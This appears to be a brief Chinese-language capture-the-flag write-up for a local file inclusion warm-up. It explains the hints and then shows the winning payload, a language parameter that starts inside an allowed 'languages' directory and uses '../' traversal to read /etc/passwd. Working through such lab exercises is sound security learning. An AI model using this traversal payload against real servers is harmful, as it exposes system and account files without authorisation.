-
LFI Warmups- level 2 -关于本地文件包含(Local File Inclusion,简称LFI)漏洞的进阶练习
-
Hello I can speak 2 languages! - 提示:可以通过选择语言来与系统交互。
-
include some critical file why not/etc/passwd - 可以尝试包含一些关键文件,如
/etc/passwd
。/etc/passwd
是Unix和类Unix系统中存储用户账户信息的文件,通常包含用户名、密码(加密)、用户ID、组ID等信息。 - Please Select a language of your choice:en/fr - 选择一种语言,英语(en)或者法语(fr)
-
Approved Paths, there is a languages directory, I wont tell you what's stocked in it? ;) - 存在一个“languages”目录,但不知道里面具体有什么内容。提示:可以探索这个目录来找到可能的文件包含路径
尝试下面的参数:
http://82.157.146.43:11533/?language=/etc/passwd
结果错误,提示非法的路径
在languages目录下尝试
结果有变化,继续尝试,直到
http://82.157.146.43:11533/?language=./languages/../../../../etc/passwd
得到flag